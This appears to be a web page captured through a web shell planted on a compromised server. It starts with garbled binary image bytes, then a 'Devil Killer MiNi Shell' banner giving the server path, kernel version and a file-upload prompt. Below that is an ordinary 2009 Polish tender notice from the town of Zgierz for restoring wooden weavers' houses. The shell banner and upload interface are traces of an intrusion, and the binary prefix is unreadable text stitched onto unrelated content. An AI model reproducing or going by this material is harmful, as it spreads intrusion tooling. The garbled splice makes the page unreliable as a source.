JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090217/38513-N-2009.html

<p class="kh_header"><b>Zgierz: Restauracja i translokacja drewnianych Domów Tkaczy w ramach projektu Rewitalizacja i rozwój historycznego kompleksu architektury drewnianej miasta Zgierza</b><br>
<b>Numer ogłoszenia: 38513 - 2009; data zamieszczenia: 17.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Zgierz , Plac Jana Pawła II 16, 95-100 Zgierz, woj. łódzkie, tel. 0427162854 w. 200, 7143200, faks 042 7143203.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.zgierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Restauracja i translokacja drewnianych Domów Tkaczy w ramach projektu Rewitalizacja i rozwój historycznego kompleksu architektury drewnianej miasta Zgierza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane, prace restauratorskie i konserwatorskie dla restauracji i translokacji drewnianych Domów Tkaczy w ramach projektu Rewitalizacja i rozwój historycznego kompleksu architektury drewnianej miasta Zgierza współfinansowanego z Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego, objęte decyzją nr 2122/2007- pozwolenia na budowę wydanego przez Starostę Zgierskiego z dnia 16 listopada 2007r                  (Załącznik nr 3) i decyzją nr 2137/2007- pozwolenia na rozbiórkę wydanej przez Starostę Zgierskiego z dnia 20 listopada 2007r (Załącznik nr 4), zgodnie z załączoną dokumentacją projektową, stanowiącą Załącznik nr 1, specyfikacją techniczną wykonania i odbioru robót budowlanych stanowiącą  Załącznik nr 2, koncepcją architektoniczną wraz z programem prac (tzw. program prac konserwatorskich) stanowiącą Załącznik nr 5, terminami udostępnienia Wykonawcy prawa dostępu do placu budowy wg Załącznika nr 6:

I. Zakres robót i prac obejmuje, w szczególności:
1.	Rozbiórkę części murowanego budynku gospodarczego, położonego przy ul. Narutowicza 5    o powierzchni do rozbiórki 63 m2 i kubaturze do rozbiórki 132 m3. 
2.	Przebudowę drewnianego budynku Domu Tkacza położonego przy ul. Narutowicza 6         dla potrzeb Centrum Konserwacji Drewna, wraz z instalacjami wewnętrznymi: wod- kan., elektryczną i elektrycznego ogrzewania.
3.	Translokację z ul. Dubois 7 w oficynę działki przy ul. Rembowskiego 1 i przebudowę drewnianego budynku Domu Tkacza dla potrzeb hostelu, wraz z instalacjami wewnętrznymi: wod- kan., elektryczną i elektrycznego ogrzewania.
4.	Translokację z ul. Dąbrowskiego 7 w front działki przy ul. Rembowskiego 1 i przebudowę drewnianego budynku Domu Tkacza wpisanego do rejestru zabytków dla funkcji muzealnych  i funkcji biurowych, wraz z instalacjami wewnętrznymi: wod- kan., elektryczną i elektrycznego ogrzewania.

 
5.	Translokację z ul. Dąbrowskiego 9 w oficynę działki przy ul. Narutowicza 5 i przebudowę drewnianego budynku Domu Tkacza wpisanego do rejestru zabytków dla potrzeb galerii i biura informacji turystycznej, wraz z instalacjami wewnętrznymi: wod- kan., elektryczną i elektrycznego ogrzewania.
6.	Budowę przyłączy do ww budynków: wody, kanalizacji sanitarnej i energii elektrycznej.
7.	Zagospodarowanie działek przy ul. Narutowicza 5 i Rembowskiego 1.

II. Harmonogram wykonania robót i prac.

1. II kwartał 2009r:

1)	Prace przygotowawcze,
2)	Rozbiórka części murowanego budynku gospodarczego przy ul. Narutowicza 5,
3)	Rozbiórka konserwatorska (demontaż) Domów Tkackich z ul. Narutowicza 6 i Dubois 7,
4)	Inne prace rozbiórkowe i uprzątnięcie terenu rozbiórki,
5)	Restauracja zużytych elementów konstrukcyjnych dla Domów Tkackich z ul. Narutowicza 6 i Dubois 7,
6)	Wykonanie ław i ścian fundamentowych dla wszystkich czterech budynków,
7)	Wykonanie izolacji przeciwwilgociowych poziomych i pionowych, dla wszystkich czterech budynków,
8)	Budowa przyłączy dla wszystkich czterech budynków: kabli zasilających NN od złączy kablowych do budynków, przyłączy wody i kanalizacji,

2. III kwartał 2009r:

1)	Wymurowanie nowych ścian wewnętrznych wraz z kominami dla Domów Tkaczy              z ul. Narutowicza 6 i Dubois 7,
2)	Montaż stanu surowego elementów drewnianej konstrukcji sumikowo- łątkowej parteru budynku: podwaliny, ścian zewnętrznych, belek stropowych i poddasza użytkowego                w konstrukcji szachulcowej, słupów, rygli, zastrzałów, wypełnienie szachulcem ścian Domów Tkaczy z ul. Narutowicza 6 i Dubois 7,
3)	Montaż więźby dachowej dla Domów Tkaczy z ul. Narutowicza 6 i Dubois 7 ,
4)	Montaż stolarki okiennej i drzwiowej wraz z okiennicami drewnianymi dla Domów Tkaczy z ul. Narutowicza 6 i Dubois 7,
5)	Montaż ślepego pułapu w stropie z dociepleniem wełną mineralną dla Domów Tkaczy        z ul. Narutowicza 6 i Dubois 7,
6)	Wykonanie obróbek z blachy cynkowo-tytanowej dla Domów Tkaczy z ul. Narutowicza 6 i Dubois 7,
7)	Wykonanie nowych warstw dachu: dachówki ceramicznej karpiówki na Domu Tkackim przy ul. Narutowicza 6 i na Domu Tkackim z ul. Dubois 7,
8)	Wykonanie warstw posadzkowych w przyziemiu budynków dla Domów Tkaczy                z ul. Narutowicza 6 i Dubois 7,
9)	Obłożenie szalunkiem drewnianym i malowanie oszalowania istniejącego murowanego budynku mieszkalnego w oficynie działki przy ul. Narutowicza 5.

3. IV kwartał 2009r:

1)	Restauracja i konserwacja pozostałych elementów drewnianych budynków z ul. Narutowicza 6 i Dubois 7, odtworzenie i montaż detalu drewnianego,
2)	Wykonanie oszalowania konstrukcji deskami drewnianymi dla Domów Tkaczy z ul. Narutowicza 6 i Dubois 7,
3)	Wykonanie orynnowania dachu i odprowadzenia wód opadowych (rur spustowych) dla Domów Tkaczy z ul. Narutowicza 6 i Dubois 7,
4)	Wykonanie instalacji elektrycznych i teleinformatycznych za wyjątkiem montażu osprzętu             i opraw oświetleniowych,
5)	Wykonanie instalacji wod-kan, za wyjątkiem montażu białej armatury i elektrycznych podgrzewaczy,
6)	Wykonanie instalacji CO za wyjątkiem montażu grzejników elektrycznych,
7)	Docieplenie zmontowanych ścian zewnętrznych o konstrukcji drewnianej i stropu poddasza wełną mineralną w systemie NidaGips,
8)	Obłożenie suchym tynkiem ścian wewnętrznych przyziemia i poddasza użytkowego, wykonanie tynków,
9)	Obłożenie suchym tynkiem stropów nad przyziemiem,
10)	Montaż sufitu podwieszonego w poddaszu użytkowym,
11)	Montaż zbiorczej instalacji wentylacji grawitacyjnej,
12)	Wykonanie ścianek działowych,
13)	Wykonanie i montaż snycerki zewnętrznej,
14)	Malowanie zewnętrznej konstrukcji i oszalowania, zewnętrznej stolarki okiennej, drzwiowej         i zewnętrznych elementów wykończeniowych,
15)	Wykonanie fundamentów pod ogrodzenie, furtki i bramy na działkach przy ul. Rembowskiego 1 i Narutowicza 5,
16)	Wykonanie nawierzchni utwardzonej z otoczaków na działce przy ul. Rembowskiego 1,
17)	Montaż schodów drewnianych.

4. I kwartał 2010r:

- dla Domów Tkaczy z ul. Narutowicza 6 i Dubois 7:
1)	Montaż podłóg drewnianych,
2)	Wykonanie tynków, posadzek i płytek ceramicznych,
3)	Montaż stolarki wewnętrznej,
4)	Malowanie stolarki wewnętrznej, ścian sufitów i podłóg,
5)	Montaż osprzętu elektrycznego i opraw oświetleniowych,
6)	Montaż białej armatury i podgrzewaczy,
7)	Montaż grzejników elektrycznych,
8)	Wykonanie pozostałych prac wykończeniowych i budowlanych dla budynków.

- dla Domów Tkaczy z ul. Dąbrowskiego 7 i ul. Dąbrowskiego 9:
1)	Prace przygotowawcze,
2)	Rozbiórka konserwatorska (demontaż) Domów Tkaczy,
3)	Inne prace rozbiórkowe i uprzątnięcie terenu rozbiórki,
4)	Wymurowanie nowych ścian wewnętrznych wraz z kominami dla Domów Tkaczy                             z ul. Narutowicza 6 i Dubois 7,
5)	Restauracja zużytych elementów konstrukcyjnych.


5. II kwartał 2010r.:

- dla Domów Tkaczy z ul. Dąbrowskiego 7 i ul. Dąbrowskiego 9:
1)	Restauracja i konserwacja pozostałych elementów drewnianych budynków, odtworzenie detalu drewnianego 
2)	Montaż stanu surowego elementów drewnianej konstrukcji sumikowo- łątkowej parteru budynku: podwaliny, ścian zewnętrznych, belek stropowych i poddasza użytkowego w konstrukcji szachulcowej, słupów, rygli, zastrzałów, wypełnienie szachulcem ścian,
3)	Montaż więźb dachowych,
4)	Wykonanie obróbek z blachy cynkowo-tytanowej,
5)	Montaż zewnętrznej stolarki okiennej i drzwiowej wraz z okiennicami drewnianymi,
6)	Montaż ślepego pułapu w stropach z dociepleniem wełną mineralną,
7)	Docieplenie zmontowanych ścian zewnętrznych o konstrukcji drewnianej i stropu poddasza wełną mineralną w systemie Nida Gips,
8)	Wykonanie nowych warstw dachu: dachówka ceramiczna karpiówka,
9)	Wykonanie warstw posadzkowych w przyziemiu budynków,
10)	Wykonanie nawierzchni utwardzonej z otoczaków na działce przy ul. Narutowicza 5,
11)	Wykonanie i montaż ogrodzeń, bram i furtek na działkach przy ul. Narutowicza 5                        i ul. Rembowskiego 1.

6. III kwartał 2010r.:

- dla Domów Tkaczy z ul. Dąbrowskiego 7 i ul. Dąbrowskiego 9:
1)	Wykonanie oszalowania konstrukcji Domów Tkaczy deskami drewnianymi, montaż detalu drewnianego,
2)	Wykonanie orynnowania dachu i odprowadzenia wód opadowych (rur spustowych), 
3)	Wykonanie instalacji elektrycznych i teleinformatycznych za wyjątkiem montażu osprzętu               i opraw oświetleniowych,
4)	Wykonanie instalacji wod-kan, za wyjątkiem montażu białej armatury i elektrycznych podgrzewaczy,
5)	Wykonanie instalacji CO za wyjątkiem montażu grzejników elektrycznych,
6)	Obłożenie suchym tynkiem ścian wewnętrznych przyziemia i poddasza użytkowego, wykonanie tynków,
7)	Obłożenie suchym tynkiem stropów nad przyziemiem,
8)	Montaż sufitu podwieszonego w poddaszu użytkowym,
9)	Montaż zbiorczej instalacji wentylacji grawitacyjnej,
10)	Wykonanie ścianek działowych,
11)	Wykonanie i montaż snycerki zewnętrznej,
12)	Malowanie zewnętrznej konstrukcji i oszalowania, zewnętrznej stolarki okiennej, drzwiowej         i zewnętrznych elementów wykończeniowych,
13)	Wykonanie terenów zielonych na działkach przy ul. Narutowicza 5 i ul. Rembowskiego 1,
14)	Montaż schodów drewnianych.

7. IV kwartał 2010r.:

- dla Domów Tkaczy z ul. Dąbrowskiego 7 i ul. Dąbrowskiego 9
1)	Montaż podłóg drewnianych,
2)	Wykonanie tynków, posadzek i płytek ceramicznych,
3)	Montaż stolarki wewnętrznej,
4)	Malowanie stolarki wewnętrznej, ścian, sufitów i podłóg,
5)	Montaż osprzętu elektrycznego i opraw oświetleniowych,
6)	Montaż białej armatury i podgrzewaczy,
7)	Montaż grzejników elektrycznych,
8)	Wykonanie pozostałych prac wykończeniowych i budowlanych dla budynków                                  i zagospodarowania działek.


III. Wymagania i uwagi.

1.	W budynkach: z ul. Dąbrowskiego 7 przemieszczonego na działkę przy ul. Rembowskiego 1 (front), z ul. Dąbrowskiego 9 przemieszczonego na działkę przy ul. Narutowicza 5 i z ul. Dubois 7 przemieszczonego na działkę przy ul. Rembowskiego 1 (oficyna) należy wykonać pokrycie dachowe /zamiast z gontu/ z dachówki ceramicznej karpiówki- analogicznie jak w budynku przy ul. Narutowicza 6. Dla wszystkich 4 budynków zastosować kolor dachówki: naturalny czerwony. Zmiana materiału pokrycia dachowego ujęta jest w załączonych przedmiarach. Zmianę powyższą należy uwzględnić w ofercie. 
2.	Podmurówkę ogrodzeń działki przy ul. Narutowicza 5 i przy ul. Rembowskiego 1 wykonać z kamienia polnego (z tzw. otoczaków), zamiast podmurówki z cegły pełnej. Zmiana materiału podmurówki ujęta jest w przedmiarze. Zmianę powyższą należy uwzględnić w ofercie. 
3.	W trakcie budowy, przed i po jej zakończeniu na terenie budowy prowadzone będą badania naukowe i nadzór naukowy przez pracowników instytucji naukowej wyłonionej w drodze postępowania przetargowego. Wyniki tych badań i opinie naukowców będą stanowić materiał pomocniczy dla Zamawiającego. Pracownicy naukowi mają prawo uczestniczyć we wszystkich naradach odbywających się w związku z przedmiotową inwestycją z głosem doradczym dla inwestora. Pracownicy naukowi nie mają prawa do wydawania poleceń Wykonawcy. Pracownicy naukowi mają prawo przebywać na placu budowy w każdym czasie.
4.	W przypadku, gdy podczas demontażu budynków objętych niniejszym opisem przedmiotu zamówienia lub w wyniku badań naukowych zostanie wykryty pierwotny materiał posadzki sieni budynków (np. posadzka z piaskowca), Wykonawca będzie zobowiązany do wykonania posadzki z takiego samego materiału zamiast z materiału określonego w projekcie. Możliwość wystąpienia powyższej zmiany należy uwzględnić w ofercie. 
Ta uwaga dotyczy pomieszczeń oznaczonych:
1)	0.01 KOMUNIK. na Rysunku nr 8 pt. Rzut przyziemia Projektu budowlano- konserwatorskiego remontu i adaptacji domu tkacza translokowanego z ul. Dąbrowskiego 7 na front posesji przy ul. Rembowskiego 1 w Zgierzu na potrzeby Parku Kulturowego Miasto Tkaczy,
2)	0.01 KOMUNIK. na Rysunku nr 7 Projektu budowlano- konserwatorskiego remontu i adaptacji domu tkacza translokowanego z ul. Dąbrowskiego 9 w oficynę posesji na ul. Narutowicza 5 w Zgierzu na potrzeby Parku Kulturowego Miasto Tkaczy,
3)	0.01 SIEŃ, 0.02 KOMUNIKACJA na Rysunku nr 8 pt. Rzut przyziemia Projektu budowlano- konserwatorskiego remontu i adaptacji domu tkacza translokowanego z ul. Dubois 7 w oficynę posesji na ul. Rembowskiego 1 w Zgierzu na potrzeby Parku Kulturowego Miasto Tkaczy,
4)	0.01 KOMUNIKACJA na Rysunku nr 6 pt. Rzut przyziemia Projektu budowlano- konserwatorskiego remontu i adaptacji domu tkacza potrzeby Parku Kulturowego Miasto Tkaczy, Zgierz ul. Narutowicza 6.

5.	Deski podłogowe i każdy widoczny element drewniany zastępujący element oryginalny, w tym stolarkę okienną i drzwiową  należy poddać procesowi mechanicznego postarzenia poprzez piaskowanie albo szczotkowanie, albo inną technologią zaakceptowaną przez inwestora.
6.	Kierownik budowy jest zobowiązany do uczestniczenia w sympozjach i konferencjach (łączny czas pobytu na konferencjach ustala się na 18 roboczogodzin), będących elementem planu promocji projektu celem przedłożenia sprawozdania z przebiegu prac  i doświadczeń z realizacji inwestycji. Konferencje odbędą się: pierwsza- w II kwartale 2009r,  druga- w III kwartale 2010r, trzecia- w I kwartale 2011r. w Zgierzu.
7.	Kierownik budowy ma obowiązek uczestniczenia w posiedzeniach kolegium budowy,   w skład którego wchodzą: kierownik budowy, przedstawiciel inwestora, inspektor nadzoru, przedstawiciel instytucji prowadzącej badania naukowe i inni zaproszeni         w razie potrzeby specjaliści. Posiedzenia te odbywać się będą raz w tygodniu                 w poniedziałek w siedzibie inwestora lub na terenie budowy. W sprawach nagłych posiedzenia kolegium budowy mogą się odbywać również w innych terminach. Obowiązek uczestnictwa w takich przypadkach stosuje się odpowiednio.
8.	Zamawiający zastrzega możliwość monitorowania terenu budowy kamerami internetowymi on- line i zamieszczenia obrazu na stronie internetowej powstałej dla projektu Rewitalizacja i rozwój historycznego kompleksu architektury drewnianej miasta Zgierza. Kamery służyć będą wyłącznie celom promocyjnym i nie będą elementem miejskiego systemu wizyjnego służącego celom zabezpieczenia obiektów.
9.	Ogrodzenie terenu budowy należy wykonać z materiału ażurowego. Rodzaj zastosowanego ogrodzenia terenu budowy wymaga zatwierdzenia przez inwestora.
10.	Przedmiar na roboty związane z oszalowaniem istniejącego budynku mieszkalnego zawarty jest w książce przedmiarów Budowa komórek i obudowa budynku deskami w poz. 4  pt. oszalowanie elewacji istniejącego budynku.  Inne prace umieszczone w ww Książce przedmiarów (związane z budową komórek) nie są objęte niniejszym przedmiotem zamówienia.
11.	Wykonanie drewnianej pergoli z drewnianymi ławkami w głębi podwórka przy ul. Rembowskiego 1 nie jest objęte niniejszym przedmiotem zamówienia.
12.	Przedmiary robót zawarte w dokumentacji projektowej należy traktować jako materiał pomocniczy, nie będący podstawą opisu przedmiotu zamówienia i obliczenia ceny ryczałtowej oferty.
13.	Nazwy własne użyte w Specyfikacji Istotnych Warunków Zamówienia znaków towarowych, patentów lub pochodzenia są przykładowymi. Dopuszczalne jest zastosowanie środków równoważnych pod względem jakości i trwałości. Za równoważne Zamawiający uzna materiały, urządzenia i technologie o takich samych lub wyższych charakterystykach technicznych i funkcjonalnych i o takich samych lub wyższych parametrach jakościowych.
14.	Zamawiający dopuszcza rozwiązania równoważne rozwiązaniom opisanym w Specyfikacji Istotnych Warunków Zamówienia za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia. Załączniki nr: 1, 2, 3, 4, 5 oraz 6 stanowią załączniki do opisu przedmiotu zamówienia.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.31.10.00-0, 45.33.00.00-9, 45.33.20.00-3, 45.20.00.00-9, 45.23.10.00-5, 45.23.13.00-8, 45.23.14.00-9, 45.23.32.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości 10 000.00 PLN. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy: PEKAO S.A. O / Zgierz 65124030571111000034377367 . Wadium wnoszone w innej formie należy złożyć w kasie, pokój nr 014, Urząd Miasta Zgierza, Plac Jana Pawła II 16, 95-100 Zgierz<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy: 1) spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 1 - 4 prawa zamówień publicznych, tj. którzy: 1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 prawa zamówień publicznych, według którego : 1. Z postępowania o udzielenie zamówienia wyklucza się: 1) wykonawców, którzy wyrządzili szkodę, niewykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania; 2) wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego; 3) wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 4) osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 5) spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 6) spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 7) spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 8) osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 9) podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary; 10) wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3. 2. Z postępowania o udzielenie zamówienia wyklucza się również wykonawców, którzy: 1) wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; przepisu nie stosuje się do wykonawców, którym udziela się zamówienia na podstawie art. 62 ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2; 2) złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania; 3) nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3; 4) nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą. O udzielenie zamówienia ubiegać się mogą 